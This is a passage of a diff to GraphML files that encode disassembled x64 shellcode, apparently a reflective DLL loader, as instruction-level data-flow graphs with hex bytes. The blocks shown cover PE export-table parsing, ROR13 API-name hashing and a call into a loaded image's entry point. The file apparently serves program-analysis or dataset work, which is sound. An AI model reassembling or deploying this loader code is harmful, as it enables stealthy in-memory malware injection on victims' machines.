+        <edge source="block.0x14da:instruction.0x1510" target="block.0x14da:instruction.0x1524"/>
+        <edge source="block.0x14da:instruction.0x1513" target="block.0x14da:instruction.0x1518"/>
+        <edge source="block.0x14da:instruction.0x1513" target="block.0x14da:instruction.0x1524"/>
+        <edge source="block.0x14da:instruction.0x1518" target="block.0x14da:instruction.0x1524"/>
+        <edge source="block.0x14da:instruction.0x151d" target="block.0x14da:instruction.0x1524"/>
+      </graph>
+    </node>
+    <node id="block.0x1529">
+      <data key="address">0x1529</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1529</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1529:instruction.0x1529">
+          <data key="address">0x1529</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4883c448</data>
+          <data key="instruction.source">add rsp, 0x48</data>
+        </node>
+      </graph>
+    </node>
+    <node id="block.0x152d">
+      <data key="address">0x152d</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x152d</data>
+        <data key="type">instructions</data>
+        <node id="block.0x152d:instruction.0x152d">
+          <data key="address">0x152d</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4983c528</data>
+          <data key="instruction.source">add r13, 0x28</data>
+        </node>
+        <node id="block.0x152d:instruction.0x1531">
+          <data key="address">0x1531</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">41ffcf</data>
+          <data key="instruction.source">dec r15d</data>
+        </node>
+        <node id="block.0x152d:instruction.0x1534">
+          <data key="address">0x1534</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">e971ffffff</data>
+          <data key="instruction.source">jmp 0x14aa</data>
+        </node>
+        <edge source="block.0x152d:instruction.0x152d" target="block.0x152d:instruction.0x1531"/>
+        <edge source="block.0x152d:instruction.0x1531" target="block.0x152d:instruction.0x1534"/>
+      </graph>
+    </node>
+    <node id="block.0x1539">
+      <data key="address">0x1539</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1539</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1539:instruction.0x1539">
+          <data key="address">0x1539</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">488b4dd0</data>
+          <data key="instruction.source">mov rcx, qword ptr [rbp - 0x30]</data>
+        </node>
+        <node id="block.0x1539:instruction.0x153d">
+          <data key="address">0x153d</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b413c</data>
+          <data key="instruction.source">mov eax, dword ptr [rcx + 0x3c]</data>
+        </node>
+        <node id="block.0x1539:instruction.0x1540">
+          <data key="address">0x1540</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4c8d2401</data>
+          <data key="instruction.source">lea r12, [rcx + rax]</data>
+        </node>
+        <node id="block.0x1539:instruction.0x1544">
+          <data key="address">0x1544</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">418b442428</data>
+          <data key="instruction.source">mov eax, dword ptr [r12 + 0x28]</data>
+        </node>
+        <node id="block.0x1539:instruction.0x1549">
+          <data key="address">0x1549</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4c8b6dd0</data>
+          <data key="instruction.source">mov r13, qword ptr [rbp - 0x30]</data>
+        </node>
+        <node id="block.0x1539:instruction.0x154d">
+          <data key="address">0x154d</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4901c5</data>
+          <data key="instruction.source">add r13, rax</data>
+        </node>
+        <node id="block.0x1539:instruction.0x1550">
+          <data key="address">0x1550</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4883ec28</data>
+          <data key="instruction.source">sub rsp, 0x28</data>
+        </node>
+        <node id="block.0x1539:instruction.0x1554">
+          <data key="address">0x1554</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">48c7c1ffffffff</data>
+          <data key="instruction.source">mov rcx, 0xffffffffffffffff</data>
+        </node>
+        <node id="block.0x1539:instruction.0x155b">
+          <data key="address">0x155b</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4831d2</data>
+          <data key="instruction.source">xor rdx, rdx</data>
+        </node>
+        <node id="block.0x1539:instruction.0x155e">
+          <data key="address">0x155e</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4531c0</data>
+          <data key="instruction.source">xor r8d, r8d</data>
+        </node>
+        <node id="block.0x1539:instruction.0x1561">
+          <data key="address">0x1561</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">ff55e0</data>
+          <data key="instruction.source">call qword ptr [rbp - 0x20]</data>
+        </node>
+        <edge source="block.0x1539:instruction.0x1539" target="block.0x1539:instruction.0x153d"/>
+        <edge source="block.0x1539:instruction.0x1539" target="block.0x1539:instruction.0x1540"/>
+        <edge source="block.0x1539:instruction.0x1539" target="block.0x1539:instruction.0x1554"/>
+        <edge source="block.0x1539:instruction.0x153d" target="block.0x1539:instruction.0x1540"/>
+        <edge source="block.0x1539:instruction.0x153d" target="block.0x1539:instruction.0x1544"/>
+        <edge source="block.0x1539:instruction.0x153d" target="block.0x1539:instruction.0x1554"/>
+        <edge source="block.0x1539:instruction.0x1540" target="block.0x1539:instruction.0x1544"/>
+        <edge source="block.0x1539:instruction.0x1540" target="block.0x1539:instruction.0x1554"/>
+        <edge source="block.0x1539:instruction.0x1544" target="block.0x1539:instruction.0x154d"/>
+        <edge source="block.0x1539:instruction.0x1549" target="block.0x1539:instruction.0x154d"/>
+        <edge source="block.0x1539:instruction.0x154d" target="block.0x1539:instruction.0x1550"/>
+        <edge source="block.0x1539:instruction.0x1550" target="block.0x1539:instruction.0x155b"/>
+        <edge source="block.0x1539:instruction.0x1550" target="block.0x1539:instruction.0x1561"/>
+        <edge source="block.0x1539:instruction.0x1554" target="block.0x1539:instruction.0x1561"/>
+        <edge source="block.0x1539:instruction.0x155b" target="block.0x1539:instruction.0x155e"/>
+        <edge source="block.0x1539:instruction.0x155e" target="block.0x1539:instruction.0x1561"/>
+      </graph>
+    </node>
+    <node id="block.0x1564">
+      <data key="address">0x1564</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1564</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1564:instruction.0x1564">
+          <data key="address">0x1564</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4883c428</data>
+          <data key="instruction.source">add rsp, 0x28</data>
+        </node>
+        <node id="block.0x1564:instruction.0x1568">
+          <data key="address">0x1568</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4883ec28</data>
+          <data key="instruction.source">sub rsp, 0x28</data>
+        </node>
+        <node id="block.0x1564:instruction.0x156c">
+          <data key="address">0x156c</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">488b4dd0</data>
+          <data key="instruction.source">mov rcx, qword ptr [rbp - 0x30]</data>
+        </node>
+        <node id="block.0x1564:instruction.0x1570">
+          <data key="address">0x1570</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">ba01000000</data>
+          <data key="instruction.source">mov edx, 1</data>
+        </node>
+        <node id="block.0x1564:instruction.0x1575">
+          <data key="address">0x1575</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4531c0</data>
+          <data key="instruction.source">xor r8d, r8d</data>
+        </node>
+        <node id="block.0x1564:instruction.0x1578">
+          <data key="address">0x1578</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">41ffd5</data>
+          <data key="instruction.source">call r13</data>
+        </node>
+        <edge source="block.0x1564:instruction.0x1564" target="block.0x1564:instruction.0x1568"/>
+        <edge source="block.0x1564:instruction.0x1568" target="block.0x1564:instruction.0x1575"/>
+        <edge source="block.0x1564:instruction.0x1568" target="block.0x1564:instruction.0x1578"/>
+        <edge source="block.0x1564:instruction.0x156c" target="block.0x1564:instruction.0x1578"/>
+        <edge source="block.0x1564:instruction.0x1570" target="block.0x1564:instruction.0x1578"/>
+        <edge source="block.0x1564:instruction.0x1575" target="block.0x1564:instruction.0x1578"/>
+      </graph>
+    </node>
+    <node id="block.0x157b">
+      <data key="address">0x157b</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x157b</data>
+        <data key="type">instructions</data>
+        <node id="block.0x157b:instruction.0x157b">
+          <data key="address">0x157b</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4883c428</data>
+          <data key="instruction.source">add rsp, 0x28</data>
+        </node>
+        <node id="block.0x157b:instruction.0x157f">
+          <data key="address">0x157f</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4c89e8</data>
+          <data key="instruction.source">mov rax, r13</data>
+        </node>
+        <node id="block.0x157b:instruction.0x1582">
+          <data key="address">0x1582</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">415f</data>
+          <data key="instruction.source">pop r15</data>
+        </node>
+        <node id="block.0x157b:instruction.0x1584">
+          <data key="address">0x1584</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">415e</data>
+          <data key="instruction.source">pop r14</data>
+        </node>
+        <node id="block.0x157b:instruction.0x1586">
+          <data key="address">0x1586</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">415d</data>
+          <data key="instruction.source">pop r13</data>
+        </node>
+        <node id="block.0x157b:instruction.0x1588">
+          <data key="address">0x1588</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">415c</data>
+          <data key="instruction.source">pop r12</data>
+        </node>
+        <node id="block.0x157b:instruction.0x158a">
+          <data key="address">0x158a</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">5f</data>
+          <data key="instruction.source">pop rdi</data>
+        </node>
+        <node id="block.0x157b:instruction.0x158b">
+          <data key="address">0x158b</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">5e</data>
+          <data key="instruction.source">pop rsi</data>
+        </node>
+        <node id="block.0x157b:instruction.0x158c">
+          <data key="address">0x158c</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">5b</data>
+          <data key="instruction.source">pop rbx</data>
+        </node>
+        <node id="block.0x157b:instruction.0x158d">
+          <data key="address">0x158d</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4889ec</data>
+          <data key="instruction.source">mov rsp, rbp</data>
+        </node>
+        <node id="block.0x157b:instruction.0x1590">
+          <data key="address">0x1590</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">5d</data>
+          <data key="instruction.source">pop rbp</data>
+        </node>
+        <node id="block.0x157b:instruction.0x1591">
+          <data key="address">0x1591</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">c3</data>
+          <data key="instruction.source">ret</data>
+        </node>
+        <edge source="block.0x157b:instruction.0x157b" target="block.0x157b:instruction.0x1582"/>
+        <edge source="block.0x157b:instruction.0x157f" target="block.0x157b:instruction.0x1586"/>
+        <edge source="block.0x157b:instruction.0x1582" target="block.0x157b:instruction.0x1584"/>
+        <edge source="block.0x157b:instruction.0x1584" target="block.0x157b:instruction.0x1586"/>
+        <edge source="block.0x157b:instruction.0x1586" target="block.0x157b:instruction.0x1588"/>
+        <edge source="block.0x157b:instruction.0x1588" target="block.0x157b:instruction.0x158a"/>
+        <edge source="block.0x157b:instruction.0x158a" target="block.0x157b:instruction.0x158b"/>
+        <edge source="block.0x157b:instruction.0x158b" target="block.0x157b:instruction.0x158c"/>
+        <edge source="block.0x157b:instruction.0x158c" target="block.0x157b:instruction.0x158d"/>
+        <edge source="block.0x157b:instruction.0x158d" target="block.0x157b:instruction.0x1590"/>
+        <edge source="block.0x157b:instruction.0x1590" target="block.0x157b:instruction.0x1591"/>
+      </graph>
+    </node>
+    <node id="block.0x1592">
+      <data key="address">0x1592</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1592</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1592:instruction.0x1592">
+          <data key="address">0x1592</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">418b453c</data>
+          <data key="instruction.source">mov eax, dword ptr [r13 + 0x3c]</data>
+        </node>
+        <node id="block.0x1592:instruction.0x1596">
+          <data key="address">0x1596</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">498d5c0500</data>
+          <data key="instruction.source">lea rbx, [r13 + rax]</data>
+        </node>
+        <node id="block.0x1592:instruction.0x159b">
+          <data key="address">0x159b</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b8388000000</data>
+          <data key="instruction.source">mov eax, dword ptr [rbx + 0x88]</data>
+        </node>
+        <node id="block.0x1592:instruction.0x15a1">
+          <data key="address">0x15a1</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">498d4c0500</data>
+          <data key="instruction.source">lea rcx, [r13 + rax]</data>
+        </node>
+        <node id="block.0x1592:instruction.0x15a6">
+          <data key="address">0x15a6</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">48894dc0</data>
+          <data key="instruction.source">mov qword ptr [rbp - 0x40], rcx</data>
+        </node>
+        <node id="block.0x1592:instruction.0x15aa">
+          <data key="address">0x15aa</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b4118</data>
+          <data key="instruction.source">mov eax, dword ptr [rcx + 0x18]</data>
+        </node>
+        <node id="block.0x1592:instruction.0x15ad">
+          <data key="address">0x15ad</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">48894590</data>
+          <data key="instruction.source">mov qword ptr [rbp - 0x70], rax</data>
+        </node>
+        <node id="block.0x1592:instruction.0x15b1">
+          <data key="address">0x15b1</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b4120</data>
+          <data key="instruction.source">mov eax, dword ptr [rcx + 0x20]</data>
+        </node>
+        <node id="block.0x1592:instruction.0x15b4">
+          <data key="address">0x15b4</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">498d440500</data>
+          <data key="instruction.source">lea rax, [r13 + rax]</data>
+        </node>
+        <node id="block.0x1592:instruction.0x15b9">
+          <data key="address">0x15b9</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">488945b8</data>
+          <data key="instruction.source">mov qword ptr [rbp - 0x48], rax</data>
+        </node>
+        <node id="block.0x1592:instruction.0x15bd">
+          <data key="address">0x15bd</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b4124</data>
+          <data key="instruction.source">mov eax, dword ptr [rcx + 0x24]</data>
+        </node>
+        <node id="block.0x1592:instruction.0x15c0">
+          <data key="address">0x15c0</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">498d440500</data>
+          <data key="instruction.source">lea rax, [r13 + rax]</data>
+        </node>
+        <node id="block.0x1592:instruction.0x15c5">
+          <data key="address">0x15c5</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">488945b0</data>
+          <data key="instruction.source">mov qword ptr [rbp - 0x50], rax</data>
+        </node>
+        <node id="block.0x1592:instruction.0x15c9">
+          <data key="address">0x15c9</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">c3</data>
+          <data key="instruction.source">ret</data>
+        </node>
+        <edge source="block.0x1592:instruction.0x1592" target="block.0x1592:instruction.0x1596"/>
+        <edge source="block.0x1592:instruction.0x1592" target="block.0x1592:instruction.0x159b"/>
+        <edge source="block.0x1592:instruction.0x1596" target="block.0x1592:instruction.0x159b"/>
+        <edge source="block.0x1592:instruction.0x159b" target="block.0x1592:instruction.0x15a1"/>
+        <edge source="block.0x1592:instruction.0x159b" target="block.0x1592:instruction.0x15aa"/>
+        <edge source="block.0x1592:instruction.0x15a1" target="block.0x1592:instruction.0x15a6"/>
+        <edge source="block.0x1592:instruction.0x15a1" target="block.0x1592:instruction.0x15aa"/>
+        <edge source="block.0x1592:instruction.0x15a1" target="block.0x1592:instruction.0x15b1"/>
+        <edge source="block.0x1592:instruction.0x15a1" target="block.0x1592:instruction.0x15bd"/>
+        <edge source="block.0x1592:instruction.0x15a6" target="block.0x1592:instruction.0x15c9"/>
+        <edge source="block.0x1592:instruction.0x15aa" target="block.0x1592:instruction.0x15ad"/>
+        <edge source="block.0x1592:instruction.0x15aa" target="block.0x1592:instruction.0x15b1"/>
+        <edge source="block.0x1592:instruction.0x15ad" target="block.0x1592:instruction.0x15b1"/>
+        <edge source="block.0x1592:instruction.0x15b1" target="block.0x1592:instruction.0x15b4"/>
+        <edge source="block.0x1592:instruction.0x15b4" target="block.0x1592:instruction.0x15b9"/>
+        <edge source="block.0x1592:instruction.0x15b4" target="block.0x1592:instruction.0x15bd"/>
+        <edge source="block.0x1592:instruction.0x15b9" target="block.0x1592:instruction.0x15bd"/>
+        <edge source="block.0x1592:instruction.0x15bd" target="block.0x1592:instruction.0x15c0"/>
+        <edge source="block.0x1592:instruction.0x15c0" target="block.0x1592:instruction.0x15c5"/>
+        <edge source="block.0x1592:instruction.0x15c5" target="block.0x1592:instruction.0x15c9"/>
+      </graph>
+    </node>
+    <node id="block.0x15ca">
+      <data key="address">0x15ca</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x15ca</data>
+        <data key="type">instructions</data>
+        <node id="block.0x15ca:instruction.0x15ca">
+          <data key="address">0x15ca</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">31c0</data>
+          <data key="instruction.source">xor eax, eax</data>
+        </node>
+      </graph>
+    </node>
+    <node id="block.0x15cc">
+      <data key="address">0x15cc</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x15cc</data>
+        <data key="type">instructions</data>
+        <node id="block.0x15cc:instruction.0x15cc">
+          <data key="address">0x15cc</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">0fb619</data>
+          <data key="instruction.source">movzx ebx, byte ptr [rcx]</data>
+        </node>
+        <node id="block.0x15cc:instruction.0x15cf">
+          <data key="address">0x15cf</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">85db</data>
+          <data key="instruction.source">test ebx, ebx</data>
+        </node>
+        <node id="block.0x15cc:instruction.0x15d1">
+          <data key="address">0x15d1</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">740a</data>
+          <data key="instruction.source">je 0x15dd</data>
+        </node>
+        <edge source="block.0x15cc:instruction.0x15cc" target="block.0x15cc:instruction.0x15cf"/>
+        <edge source="block.0x15cc:instruction.0x15cf" target="block.0x15cc:instruction.0x15d1"/>
+      </graph>
+    </node>
+    <node id="block.0x15d3">
+      <data key="address">0x15d3</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x15d3</data>
+        <data key="type">instructions</data>
+        <node id="block.0x15d3:instruction.0x15d3">
+          <data key="address">0x15d3</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">c1c80d</data>
+          <data key="instruction.source">ror eax, 0xd</data>
+        </node>
+        <node id="block.0x15d3:instruction.0x15d6">
+          <data key="address">0x15d6</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">01d8</data>
+          <data key="instruction.source">add eax, ebx</data>
+        </node>
+        <node id="block.0x15d3:instruction.0x15d8">
+          <data key="address">0x15d8</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">48ffc1</data>
+          <data key="instruction.source">inc rcx</data>
+        </node>
+        <node id="block.0x15d3:instruction.0x15db">
+          <data key="address">0x15db</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">ebef</data>
+          <data key="instruction.source">jmp 0x15cc</data>
+        </node>
+        <edge source="block.0x15d3:instruction.0x15d3" target="block.0x15d3:instruction.0x15d6"/>
+        <edge source="block.0x15d3:instruction.0x15d3" target="block.0x15d3:instruction.0x15d8"/>
+        <edge source="block.0x15d3:instruction.0x15d6" target="block.0x15d3:instruction.0x15d8"/>
+        <edge source="block.0x15d3:instruction.0x15d8" target="block.0x15d3:instruction.0x15db"/>
+      </graph>
+    </node>
+    <node id="block.0x15dd">
+      <data key="address">0x15dd</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x15dd</data>
+        <data key="type">instructions</data>
+        <node id="block.0x15dd:instruction.0x15dd">
+          <data key="address">0x15dd</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">c3</data>
+          <data key="instruction.source">ret</data>
+        </node>
+      </graph>
+    </node>
+    <node id="block.0x15de">
+      <data key="address">0x15de</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x15de</data>
+        <data key="type">instructions</data>
+        <node id="block.0x15de:instruction.0x15de">
+          <data key="address">0x15de</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">418b4204</data>
+          <data key="instruction.source">mov eax, dword ptr [r10 + 4]</data>
+        </node>
+        <node id="block.0x15de:instruction.0x15e2">
+          <data key="address">0x15e2</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4d8d5a08</data>
+          <data key="instruction.source">lea r11, [r10 + 8]</data>
+        </node>
+        <node id="block.0x15de:instruction.0x15e6">
+          <data key="address">0x15e6</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4989ca</data>
+          <data key="instruction.source">mov r10, rcx</data>
+        </node>
+        <node id="block.0x15de:instruction.0x15e9">
+          <data key="address">0x15e9</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">41ffe3</data>
+          <data key="instruction.source">jmp r11</data>
+        </node>
+        <edge source="block.0x15de:instruction.0x15de" target="block.0x15de:instruction.0x15e6"/>
+        <edge source="block.0x15de:instruction.0x15e2" target="block.0x15de:instruction.0x15e6"/>
+        <edge source="block.0x15de:instruction.0x15e2" target="block.0x15de:instruction.0x15e9"/>
+        <edge source="block.0x15de:instruction.0x15e6" target="block.0x15de:instruction.0x15e9"/>
+      </graph>
+    </node>
+    <edge source="block.0x1000" target="block.0x103c"/>
+    <edge source="block.0x103c" target="block.0x1041"/>
+    <edge source="block.0x1041" target="block.0x1049"/>
+    <edge source="block.0x1049" target="block.0x1052"/>
+    <edge source="block.0x1052" target="block.0x105a"/>
+    <edge source="block.0x105a" target="block.0x1061"/>
+    <edge source="block.0x1061" target="block.0x106e"/>
+    <edge source="block.0x106e" target="block.0x1077"/>
+    <edge source="block.0x1077" target="block.0x108c"/>
+    <edge source="block.0x108c" target="block.0x1095"/>
+    <edge source="block.0x1095" target="block.0x10a7"/>
+    <edge source="block.0x10a7" target="block.0x10ae"/>
+    <edge source="block.0x10ae" target="block.0x10ba"/>
+    <edge source="block.0x10ba" target="block.0x10bd"/>
+    <edge source="block.0x10bd" target="block.0x10c8"/>
+    <edge source="block.0x10c8" target="block.0x10d1"/>
+    <edge source="block.0x10d1" target="block.0x10de"/>
+    <edge source="block.0x10de" target="block.0x10e3"/>
+    <edge source="block.0x10e3" target="block.0x10f4"/>
+    <edge source="block.0x10f4" target="block.0x10ff"/>
+    <edge source="block.0x10ff" target="block.0x110c"/>
+    <edge source="block.0x110c" target="block.0x1122"/>
+    <edge source="block.0x1122" target="block.0x1130"/>
+    <edge source="block.0x1130" target="block.0x1137"/>
+    <edge source="block.0x1137" target="block.0x1139"/>
+    <edge source="block.0x1139" target="block.0x1165"/>
+    <edge source="block.0x1165" target="block.0x116b"/>
+    <edge source="block.0x116b" target="block.0x116f"/>
+    <edge source="block.0x116f" target="block.0x1189"/>
+    <edge source="block.0x1189" target="block.0x1198"/>
+    <edge source="block.0x1198" target="block.0x11a9"/>
+    <edge source="block.0x11a9" target="block.0x11b4"/>
+    <edge source="block.0x11b4" target="block.0x11c1"/>
+    <edge source="block.0x11c1" target="block.0x11d7"/>
+    <edge source="block.0x11d7" target="block.0x11e5"/>
+    <edge source="block.0x11e5" target="block.0x11ec"/>
+    <edge source="block.0x11ec" target="block.0x11f3"/>
+    <edge source="block.0x11f3" target="block.0x11f5"/>
+    <edge source="block.0x11f5" target="block.0x1221"/>
+    <edge source="block.0x1221" target="block.0x1227"/>
+    <edge source="block.0x1227" target="block.0x122e"/>
+    <edge source="block.0x122e" target="block.0x1234"/>
+    <edge source="block.0x1234" target="block.0x123b"/>
+    <edge source="block.0x123b" target="block.0x1251"/>
+    <edge source="block.0x1251" target="block.0x1260"/>
+    <edge source="block.0x1260" target="block.0x1269"/>
+    <edge source="block.0x1269" target="block.0x1272"/>
+    <edge source="block.0x1272" target="block.0x127b"/>
+    <edge source="block.0x127b" target="block.0x1287"/>
+    <edge source="block.0x1287" target="block.0x1290"/>
+    <edge source="block.0x1290" target="block.0x129c"/>
+    <edge source="block.0x129c" target="block.0x12ee"/>
+    <edge source="block.0x12ee" target="block.0x1308"/>
+    <edge source="block.0x1308" target="block.0x130a"/>
+    <edge source="block.0x130a" target="block.0x131b"/>
+    <edge source="block.0x131b" target="block.0x1320"/>
+    <edge source="block.0x1320" target="block.0x133a"/>
+    <edge source="block.0x133a" target="block.0x133c"/>
+    <edge source="block.0x133c" target="block.0x1345"/>
+    <edge source="block.0x1345" target="block.0x1355"/>
+    <edge source="block.0x1355" target="block.0x135c"/>
+    <edge source="block.0x135c" target="block.0x1368"/>
+    <edge source="block.0x1368" target="block.0x1376"/>
+    <edge source="block.0x1376" target="block.0x1384"/>
+    <edge source="block.0x1384" target="block.0x1388"/>
+    <edge source="block.0x1388" target="block.0x139a"/>
+    <edge source="block.0x139a" target="block.0x13a2"/>
+    <edge source="block.0x13a2" target="block.0x13b1"/>
+    <edge source="block.0x13b1" target="block.0x13c9"/>
+    <edge source="block.0x13c9" target="block.0x13d2"/>
+    <edge source="block.0x13d2" target="block.0x13e0"/>
+    <edge source="block.0x13e0" target="block.0x13e7"/>
+    <edge source="block.0x13e7" target="block.0x13f1"/>
+    <edge source="block.0x13f1" target="block.0x13fa"/>
+    <edge source="block.0x13fa" target="block.0x1416"/>
+    <edge source="block.0x1416" target="block.0x1422"/>
+    <edge source="block.0x1422" target="block.0x1429"/>
+    <edge source="block.0x1429" target="block.0x1431"/>
+    <edge source="block.0x1431" target="block.0x1447"/>
+    <edge source="block.0x1447" target="block.0x144c"/>
+    <edge source="block.0x144c" target="block.0x1460"/>
+    <edge source="block.0x1460" target="block.0x1465"/>
+    <edge source="block.0x1465" target="block.0x1467"/>
+    <edge source="block.0x1467" target="block.0x1472"/>
+    <edge source="block.0x1472" target="block.0x147c"/>
+    <edge source="block.0x147c" target="block.0x1485"/>
+    <edge source="block.0x1485" target="block.0x148e"/>
+    <edge source="block.0x148e" target="block.0x14aa"/>
+    <edge source="block.0x14aa" target="block.0x14b3"/>
+    <edge source="block.0x14b3" target="block.0x14bb"/>
+    <edge source="block.0x14bb" target="block.0x14d2"/>
+    <edge source="block.0x14d2" target="block.0x14da"/>
+    <edge source="block.0x14da" target="block.0x1529"/>
+    <edge source="block.0x1529" target="block.0x152d"/>
+    <edge source="block.0x152d" target="block.0x1539"/>
+    <edge source="block.0x1539" target="block.0x1564"/>
+    <edge source="block.0x1564" target="block.0x157b"/>
+    <edge source="block.0x157b" target="block.0x1592"/>
+    <edge source="block.0x1592" target="block.0x15ca"/>
+    <edge source="block.0x15ca" target="block.0x15cc"/>
+    <edge source="block.0x15cc" target="block.0x15d3"/>
+    <edge source="block.0x15d3" target="block.0x15dd"/>
+    <edge source="block.0x15dd" target="block.0x15de"/>
+  </graph>
+</graphml>

--- a/data/shellcode/reflective_loader.x64.graphml
+++ b/data/shellcode/reflective_loader.x64.graphml
@@ -134,6 +134,7 @@
         </node>
         <edge source="block.0x1000:instruction.0x1000" target="block.0x1000:instruction.0x1001"/>
         <edge source="block.0x1000:instruction.0x1000" target="block.0x1000:instruction.0x1004"/>
+        <edge source="block.0x1000:instruction.0x1000" target="block.0x1000:instruction.0x100f"/>
         <edge source="block.0x1000:instruction.0x1001" target="block.0x1000:instruction.0x1004"/>
         <edge source="block.0x1000:instruction.0x1001" target="block.0x1000:instruction.0x101d"/>
         <edge source="block.0x1000:instruction.0x1001" target="block.0x1000:instruction.0x1021"/>
@@ -149,7 +150,7 @@
         <edge source="block.0x1000:instruction.0x1012" target="block.0x1000:instruction.0x1014"/>
         <edge source="block.0x1000:instruction.0x1014" target="block.0x1000:instruction.0x1016"/>
         <edge source="block.0x1000:instruction.0x1016" target="block.0x1000:instruction.0x1018"/>
-        <edge source="block.0x1000:instruction.0x1018" target="block.0x1000:instruction.0x103a"/>
+        <edge source="block.0x1000:instruction.0x1018" target="block.0x1000:instruction.0x101d"/>
         <edge source="block.0x1000:instruction.0x101a" target="block.0x1000:instruction.0x101d"/>
         <edge source="block.0x1000:instruction.0x101a" target="block.0x1000:instruction.0x1021"/>
         <edge source="block.0x1000:instruction.0x101a" target="block.0x1000:instruction.0x1025"/>
@@ -363,6 +364,9 @@
           <data key="instruction.hex">488b4020</data>
           <data key="instruction.source">mov rax, qword ptr [rax + 0x20]</data>
         </node>
+        <edge source="block.0x1077:instruction.0x1077" target="block.0x1077:instruction.0x107b"/>
+        <edge source="block.0x1077:instruction.0x1077" target="block.0x1077:instruction.0x1084"/>
+        <edge source="block.0x1077:instruction.0x1077" target="block.0x1077:instruction.0x1088"/>
         <edge source="block.0x1077:instruction.0x107b" target="block.0x1077:instruction.0x1084"/>
         <edge source="block.0x1077:instruction.0x1084" target="block.0x1077:instruction.0x1088"/>
       </graph>
@@ -418,7 +422,7 @@
           <data key="instruction.hex">0f84e9010000</data>
           <data key="instruction.source">je 0x1290</data>
         </node>
-        <edge source="block.0x1095:instruction.0x1095" target="block.0x1095:instruction.0x10a1"/>
+        <edge source="block.0x1095:instruction.0x1095" target="block.0x1095:instruction.0x1099"/>
         <edge source="block.0x1095:instruction.0x1099" target="block.0x1095:instruction.0x109e"/>
         <edge source="block.0x1095:instruction.0x109e" target="block.0x1095:instruction.0x10a1"/>
       </graph>
@@ -611,10 +615,11 @@
         <node id="block.0x10e3:instruction.0x10ef">
           <data key="address">0x10ef</data>
           <data key="type">instruction</data>
-          <data key="instruction.hex">e89e040000</data>
